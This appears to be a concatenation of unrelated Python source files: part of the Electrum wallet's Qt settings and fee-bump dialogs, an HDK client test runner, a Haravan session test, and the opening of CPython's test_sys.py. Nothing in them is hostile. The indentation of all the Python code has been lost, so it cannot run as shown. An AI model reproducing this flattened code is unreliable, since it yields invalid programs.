tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
def on_outrounding(x):
self.config.set_key('coin_chooser_output_rounding', bool(x))
enable_outrounding = self.config.get('coin_chooser_output_rounding', False)
outrounding_cb = QCheckBox(_('Enable output value rounding'))
outrounding_cb.setToolTip(
_('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' +
_('This might improve your privacy somewhat.') + '\n' +
_('If enabled, at most 100 satoshis might be lost due to this, per transaction.'))
outrounding_cb.setChecked(enable_outrounding)
outrounding_cb.stateChanged.connect(on_outrounding)
tx_widgets.append((outrounding_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
hist_capgains_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
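# The update_* helpers below refresh these widgets from the current fiat/exchange settings;
# the on_* handlers persist the user's changes and cascade the required refreshes
# (history, addresses, exchange list).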
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_history_capgains_cb():
if not self.fx: return
hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config())
hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.blockSignals(True)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
ex_combo.blockSignals(False)
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_model.refresh('on_history')
if self.fx.is_enabled() and checked:
self.fx.trigger_update()
update_history_capgains_cb()
def on_history_capgains(checked):
if not self.fx: return
self.fx.set_history_capital_gains_config(checked)
self.history_model.refresh('on_history_capgains')
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_history_capgains_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
hist_capgains_checkbox.stateChanged.connect(on_history_capgains)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('General')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.trigger_update()
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.network.unregister_callback(self.on_quotes)
self.network.unregister_callback(self.on_history)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
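# Each plugin gets a checkbox; toggling it loads or unloads the plugin, and a loaded plugin
# that requires settings also gets its settings widget placed next to the checkbox.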
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_fee = self.wallet.get_tx_fee(parent_tx)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
out_amt = max_fee - fee_e.get_amount()
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_e.get_amount()
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
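# The child's fee is whatever is needed for the combined (parent + child) size to reach the
# target feerate, minus what the parent already pays; it is capped at the value available to
# the child transaction and floored at roughly 1 sat/byte of the combined size.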
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
self.show_error(f'''{_("Can't CPFP")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
fee = self.wallet.get_tx_fee(tx)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(tx.txid())
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
vbox.addWidget(QLabel(_('Current Fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('Current Fee rate') + ': %s' % self.format_fee_rate(1000 * old_fee_rate)))
vbox.addWidget(QLabel(_('New Fee rate') + ':'))
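# Typing a rate by hand deactivates the slider; moving the slider re-activates it and
# overwrites the edit with the slider's rate (scaled down by 1000, per-kB to per-byte).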
def on_textedit_rate():
fee_slider.deactivate()
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
feerate_e.textEdited.connect(on_textedit_rate)
vbox.addWidget(feerate_e)
def on_slider_rate(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider_rate)
fee_slider.deactivate()
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee_rate = feerate_e.get_amount()
try:
new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate, config=self.config)
except CannotBumpFee as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx.txid(), tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.storage.write()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
|
runtests.py
|
#!/usr/bin/python
##########################################################################
# If not stated otherwise in this file or this component's Licenses.txt
# file the following copyright and licenses apply:
#
# Copyright 2015 RDK Management
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##########################################################################
#######################################################################
# Copyright [2014] [Cisco Systems, Inc.]
#
# Licensed under the Apache License, Version 2.0 (the \"License\");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an \"AS IS\" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#######################################################################
#
# runtests.py - HDK client library unit tests
#
import optparse
import os
import platform
import re
import shutil
import subprocess
import sys
import unittest
import threading
from unittest_server import UnittestServer
from urlparse import urlparse
# Import HDK modules
sys.path.append(os.path.join(os.path.dirname(sys.argv[0]), "..", "..", "bin", "lib"))
from hdk.testutil import BuildSuite, ActualDiffers
#
# Main
#
def main():
# Command line options
cmdParser = optparse.OptionParser()
cmdParser.add_option("-r", action = "store_true", dest = "bNoClean",
help = "No clean build")
cmdParser.add_option("-m", action = "store_true", dest = "bCheckMallocStats",
help = "Check malloc statistics")
cmdParser.add_option("-t", action = "append", dest = "testsIncluded",
help = "Run specified tests", metavar = "test")
cmdParser.add_option("-u", action = "store_true", dest = "bUpdateExpected",
help = "Update expected output")
cmdParser.add_option("--debug", action = "store_true", dest = "bDebug",
help = "Build debug binaries")
(cmdOptions, cmdArgs) = cmdParser.parse_args()
# The unittest directory
unittestDir = os.path.dirname(sys.argv[0])
if not unittestDir:
unittestDir = '.'
# Create the test runner
runner = unittest.TextTestRunner(verbosity = 2)
# Build test suite
buildDirs = (os.path.join("build", "libhdkcli"),
os.path.join("build", "libhdkcli-c++"),
os.path.join("build", "libhdkcli-logging"),
os.path.join("build", "libhdkcli-c++-logging"))
bWindowsPlatform = (platform.system() == 'Windows')
bDarwinPlatform = (platform.system() == 'Darwin')
# Build target (platform dependent)
if bWindowsPlatform:
buildTarget = "libhdkcli.dll"
elif bDarwinPlatform:
buildTarget = "libhdkcli.dylib"
else:
buildTarget = "libhdkcli.so"
buildSuite = BuildSuite(unittestDir, buildDirs, buildTarget,
not cmdOptions.bNoClean, cmdOptions.bDebug, cmdOptions.bUpdateExpected)
if not runner.run(buildSuite).wasSuccessful():
return 1
# Location of the test definitions and parameters.
dirTests = os.path.join(unittestDir, "tests")
# Run the unittests for each target.
unittestSuite = ClientUnittestSuite()
for buildDir in ((os.path.join(unittestDir, "build", "unittest-logging")),
(os.path.join(unittestDir, "build", "unittest-c++"))):
unittestSuite.addTest(dirTests, buildDir, "unittest",
cmdOptions.bCheckMallocStats,
cmdOptions.bUpdateExpected,
testsExplicit = cmdOptions.testsIncluded)
# Only update expected results with gold (first build dir)
if cmdOptions.bUpdateExpected:
break
if not runner.run(unittestSuite).wasSuccessful():
return 1
# Success
return 0
######################################################################
#
# HDK client Unit Test Suite
#
######################################################################
class ClientUnittestSuite(unittest.TestSuite):
def __init__(self):
unittest.TestSuite.__init__(self)
def addTest(self, dirTests, buildDir, target, bCheckMallocStats, bUpdateExpected, testsExplicit = None):
testNames = sorted(os.listdir(dirTests))
for testName in testNames:
testDir = os.path.join(dirTests, testName)
if os.path.isdir(testDir) and testName[0] != '.':
if testsExplicit is None or testName in testsExplicit:
test = ClientUnittestTest(testName, testDir, buildDir, target,
bCheckMallocStats,
bUpdateExpected)
unittest.TestSuite.addTest(self, test)
class ClientUnittestTest(unittest.TestCase):
__defaultHttpHost = "http://localhost:8080"
def __init__(self, testName, testDir, buildDir, target, bCheckMallocStats, bUpdateExpected):
unittest.TestCase.__init__(self)
self.__testDir = testDir
self.__buildDir = buildDir
self.__target = target
self.__test = testName
self.__bCheckMallocStats = bCheckMallocStats
self.__bUpdateExpected = bUpdateExpected
self.__methodName = None # the SOAPAction for the method
self.__networkObjectID = None
self.__httpHost = ClientUnittestTest.__defaultHttpHost
self.__httpUsername = None
self.__httpPassword = None
self.__httpTimeout = None
self.__platformExpected = False
# Input files are assumed to be named <Testname>.input.xml
self.__hnapInputFile = None
hnapInputFile = os.path.join(self.__testDir, (testName + ".input.xml"))
if os.path.exists(hnapInputFile):
self.__hnapInputFile = hnapInputFile
# Output files are assumed to be named <Testname>.output
self.__hnapOutputFile = None
hnapOutputFile = os.path.join(self.__testDir, (testName + ".output"))
if os.path.exists(hnapOutputFile):
self.__hnapOutputFile = hnapOutputFile
# Load the test parameters.
fileTestSpec = os.path.join(self.__testDir, (testName + ".test"))
if not os.path.exists(fileTestSpec):
self.fail("Test parameters do not exist for test '%s'. File '%s' does not exist." % (testName, fileTestSpec))
self.parseTestSpec(fileTestSpec)
if self.__methodName is None:
self.fail("No method specified for test '%s' in test file '%s'" % (testName, fileTestSpec))
def __str__(self):
return os.path.join(self.__buildDir, self.__target) + " " + self.__test
def parseTestSpec(self, testSpecFilePath):
# Parse test cases from spec file
fhTestSpec = open(testSpecFilePath, "rb")
reMethodNone = re.compile(r'^method:\s*(#.*)?$')
reMethod = re.compile(r'^method:\s*"?\s*(?P<method>.+?)\s*"?\s*(#.*)?$')
reHttpHost = re.compile(r'^host:\s*"?\s*(?P<host>.+?)\s*"?\s*(#.*)?$')
reNetworkObjectID = re.compile(r'^network-object-id:\s*"?\s*(?P<id>.+?)\s*"?\s*(#.*)?$')
reHttpUsername = re.compile(r'^username:\s*"?\s*(?P<username>.+?)\s*"?\s*(#.*)?$')
reHttpPassword = re.compile(r'^password:\s*"?\s*(?P<password>.+?)\s*"?\s*(#.*)?$')
reHttpTimeout = re.compile(r'^timeout:\s*"?\s*(?P<timeout>.+?)\s*"?\s*(#.*)?$')
reHttpPlatformExpected = re.compile(r'^platform-expected\s*(#.*)?$')
reComment = re.compile(r"^\s*(#.*)?$")
try:
for line in fhTestSpec:
# Don't care about whitespace or comment lines
if reComment.search(line):
continue
# Handle a method
m = reMethodNone.match(line)
if m:
self.__methodName = ""
continue
m = reMethod.match(line)
if m:
self.__methodName = m.group("method")
continue
m = reNetworkObjectID.match(line)
if m:
self.__networkObjectID = m.group("id")
continue
m = reHttpHost.match(line)
if m:
self.__httpHost = m.group("host")
continue
m = reHttpUsername.match(line)
if m:
self.__httpUsername = m.group("username")
continue
m = reHttpPassword.match(line)
if m:
self.__httpPassword = m.group("password")
continue
m = reHttpTimeout.match(line)
if m:
self.__httpTimeout = m.group("timeout")
continue
m = reHttpPlatformExpected.match(line)
if m:
self.__platformExpected = True
continue
# Raise an exception if we don't match the line
else:
raise Exception("Invalid line '%s' in test file '%s'" % (line, testSpecFilePath))
finally:
fhTestSpec.close()
def runTest(self):
# Actual and expected file locations
actualDir = os.path.join(self.__testDir, os.path.join("actual", os.path.split(self.__buildDir)[1]))
expectedDir = os.path.join(self.__testDir, "expected")
actual = os.path.join(actualDir, self.__test + ".txt")
expectedSuffix = ""
if self.__platformExpected:
if platform.system() == 'Windows':
expectedSuffix = "-Windows"
expected = os.path.join(expectedDir, self.__test + expectedSuffix + ".txt")
# Generate the command line arguments for the unittest harness binary.
cmdLineArgs = "\"" + self.__methodName + "\" \"" + self.__httpHost + "\""
if self.__networkObjectID is not None:
cmdLineArgs = cmdLineArgs + " -o" + self.__networkObjectID
if self.__httpUsername is not None:
cmdLineArgs = cmdLineArgs + " -u" + self.__httpUsername
if self.__httpPassword is not None:
cmdLineArgs = cmdLineArgs + " -p" + self.__httpPassword
if self.__httpTimeout is not None:
cmdLineArgs = cmdLineArgs + " -t" + self.__httpTimeout
# Write logging output to <Testname>.log
cmdLineArgs = cmdLineArgs + " -l\"" + os.path.join(actualDir, self.__test + ".log\"")
if self.__hnapInputFile is not None:
cmdLineArgs = cmdLineArgs + " " + self.__hnapInputFile
# Write the actual file
if not os.path.isdir(actualDir):
os.makedirs(actualDir)
if os.path.isfile(actual):
os.remove(actual)
fhActual = open(actual, "wb")
try:
server = None
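# Start a local UnittestServer on a background thread to answer the client binary's HTTP
# requests, run the freshly built harness with the library on its loader path (a malloc
# interposer is preloaded on Linux/macOS so allocation statistics can be checked), and
# capture all output into the 'actual' file for comparison against 'expected'.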
# Parse the host and port from the http host URL
url = urlparse(self.__httpHost)
host = url.netloc
port = url.port
if port is None:
if url.scheme == "https":
port = 443
else:
port = 80
else:
# Must remove the port from the host
host = re.search(r'(?P<host>.+?):\d', host).group("host")
if host:
server = UnittestServer(self.__testDir, host = host, port = port, fhLogFile = fhActual)
# Use serve_forever so we can easily shut down the server if an exception occurs while running the client code.
serverThread = threading.Thread(target = server.serve_forever)
serverThread.start()
try:
if platform.system() == 'Windows':
env = { 'SystemRoot': os.environ['SystemRoot'] } # SystemRoot is required for SxS c runtime
elif platform.system() == 'Darwin':
env = { 'DYLD_LIBRARY_PATH': self.__buildDir,
'DYLD_INSERT_LIBRARIES': os.path.join(self.__buildDir, 'malloc_interposer.dylib') }
else:
env = { 'LD_LIBRARY_PATH': self.__buildDir,
'LD_PRELOAD': os.path.join(self.__buildDir, "malloc_interposer.so") }
# Run the test
unittestProcess = subprocess.Popen(os.path.join(self.__buildDir, self.__target) + " " + cmdLineArgs, shell = True,
env = env,
stdout = subprocess.PIPE, stderr = subprocess.STDOUT)
output = unittestProcess.communicate()[0]
result = unittestProcess.wait()
if result != 0:
self.fail(output)
fhActual.write("\n******* Client Result ******\n")
fhActual.write(output)
finally:
if server is not None:
# Wait until the server thread exits.
server.shutdown()
serverThread.join()
finally:
fhActual.close()
fnDiffIgnore = []
# Compare actual and expected files
actualResult = ActualDiffers(actual, expected, self.__bUpdateExpected,
bIgnoreMallocStats = not self.__bCheckMallocStats,
fnDiffIgnore = fnDiffIgnore)
if actualResult:
self.fail(actualResult)
######################################################################
if __name__ == "__main__":
sys.exit(main())
|
base_test.py
|
import haravan
from test.test_helper import TestCase
from pyactiveresource.activeresource import ActiveResource
from mock import patch
import threading
class BaseTest(TestCase):
@classmethod
def setUpClass(cls):
cls.session1 = haravan.Session('shop1.myharavan.com', 'token1')
cls.session2 = haravan.Session('shop2.myharavan.com', 'token2')
def setUp(self):
super(BaseTest, self).setUp()
def tearDown(self):
haravan.HaravanResource.clear_session()
def test_activate_session_should_set_site_and_headers_for_given_session(self):
haravan.HaravanResource.activate_session(self.session1)
self.assertIsNone(ActiveResource.site)
self.assertEqual('https://shop1.myharavan.com/admin', haravan.HaravanResource.site)
self.assertEqual('https://shop1.myharavan.com/admin', haravan.Shop.site)
self.assertIsNone(ActiveResource.headers)
self.assertEqual('token1', haravan.HaravanResource.headers['X-Haravan-Access-Token'])
self.assertEqual('token1', haravan.Shop.headers['X-Haravan-Access-Token'])
def test_clear_session_should_clear_site_and_headers_from_Base(self):
haravan.HaravanResource.activate_session(self.session1)
haravan.HaravanResource.clear_session()
self.assertIsNone(ActiveResource.site)
self.assertIsNone(haravan.HaravanResource.site)
self.assertIsNone(haravan.Shop.site)
self.assertIsNone(ActiveResource.headers)
self.assertFalse('X-Haravan-Access-Token' in haravan.HaravanResource.headers)
self.assertFalse('X-Haravan-Access-Token' in haravan.Shop.headers)
def test_activate_session_with_one_session_then_clearing_and_activating_with_another_session_should_request_to_correct_shop(self):
haravan.HaravanResource.activate_session(self.session1)
haravan.HaravanResource.clear_session()
haravan.HaravanResource.activate_session(self.session2)
self.assertIsNone(ActiveResource.site)
self.assertEqual('https://shop2.myharavan.com/admin', haravan.HaravanResource.site)
self.assertEqual('https://shop2.myharavan.com/admin', haravan.Shop.site)
self.assertIsNone(ActiveResource.headers)
self.assertEqual('token2', haravan.HaravanResource.headers['X-Haravan-Access-Token'])
self.assertEqual('token2', haravan.Shop.headers['X-Haravan-Access-Token'])
def test_delete_should_send_custom_headers_with_request(self):
haravan.HaravanResource.activate_session(self.session1)
org_headers=haravan.HaravanResource.headers
haravan.HaravanResource.set_headers({'X-Custom': 'abc'})
with patch('haravan.HaravanResource.connection.delete') as mock:
url = haravan.HaravanResource._custom_method_collection_url('1', {})
haravan.HaravanResource.delete('1')
mock.assert_called_with(url, {'X-Custom': 'abc'})
haravan.HaravanResource.set_headers(org_headers)
def test_headers_includes_user_agent(self):
self.assertTrue('User-Agent' in haravan.HaravanResource.headers)
t = threading.Thread(target=lambda: self.assertTrue('User-Agent' in haravan.HaravanResource.headers))
t.start()
t.join()
def test_headers_is_thread_safe(self):
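# A custom header set from one thread should be visible in that thread but must not leak
# into the headers seen by a different thread, i.e. the headers mapping is expected to be per-thread.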
def testFunc():
haravan.HaravanResource.headers['X-Custom'] = 'abc'
self.assertTrue('X-Custom' in haravan.HaravanResource.headers)
t1 = threading.Thread(target=testFunc)
t1.start()
t1.join()
t2 = threading.Thread(target=lambda: self.assertFalse('X-Custom' in haravan.HaravanResource.headers))
t2.start()
t2.join()
|
test_sys.py
|
import builtins
import codecs
import gc
import locale
import operator
import os
import struct
import subprocess
import sys
import sysconfig
import test.support
from test import support
from test.support import os_helper
from test.support.script_helper import assert_python_ok, assert_python_failure
from test.support import threading_helper
import textwrap
import unittest
import warnings
# count the number of test runs, used to create unique
# strings to intern in test_intern()
INTERN_NUMRUNS = 0
class DisplayHookTest(unittest.TestCase):
def test_original_displayhook(self):
dh = sys.__displayhook__
with support.captured_stdout() as out:
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(builtins._, 42)
del builtins._
with support.captured_stdout() as out:
dh(None)
self.assertEqual(out.getvalue(), "")
self.assertTrue(not hasattr(builtins, "_"))
# sys.displayhook() requires arguments
self.assertRaises(TypeError, dh)
stdout = sys.stdout
try:
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
finally:
sys.stdout = stdout
def test_lost_displayhook(self):
displayhook = sys.displayhook
try:
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
finally:
sys.displayhook = displayhook
def test_custom_displayhook(self):
def baddisplayhook(obj):
raise ValueError
with support.swap_attr(sys, 'displayhook', baddisplayhook):
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
class ExceptHookTest(unittest.TestCase):
def test_original_excepthook(self):
try:
raise ValueError(42)
except ValueError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
self.assertRaises(TypeError, sys.__excepthook__)
def test_excepthook_bytes_filename(self):
# bpo-37467: sys.excepthook() must not crash if a filename
# is a bytes string
with warnings.catch_warnings():
warnings.simplefilter('ignore', BytesWarning)
try:
raise SyntaxError("msg", (b"bytes_filename", 123, 0, "text"))
except SyntaxError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
err = err.getvalue()
self.assertIn(""" File "b'bytes_filename'", line 123\n""", err)
self.assertIn(""" text\n""", err)
self.assertTrue(err.endswith("SyntaxError: msg\n"))
def test_excepthook(self):
with test.support.captured_output("stderr") as stderr:
sys.excepthook(1, '1', 1)
self.assertTrue("TypeError: print_exception(): Exception expected for " \
"value, str found" in stderr.getvalue())
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
class SysModuleTest(unittest.TestCase):
def tearDown(self):
test.support.reap_children()
def test_exit(self):
# call with two arguments
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
with self.assertRaises(SystemExit) as cm:
sys.exit()
self.assertIsNone(cm.exception.code)
rc, out, err = assert_python_ok('-c', 'import sys; sys.exit()')
self.assertEqual(rc, 0)
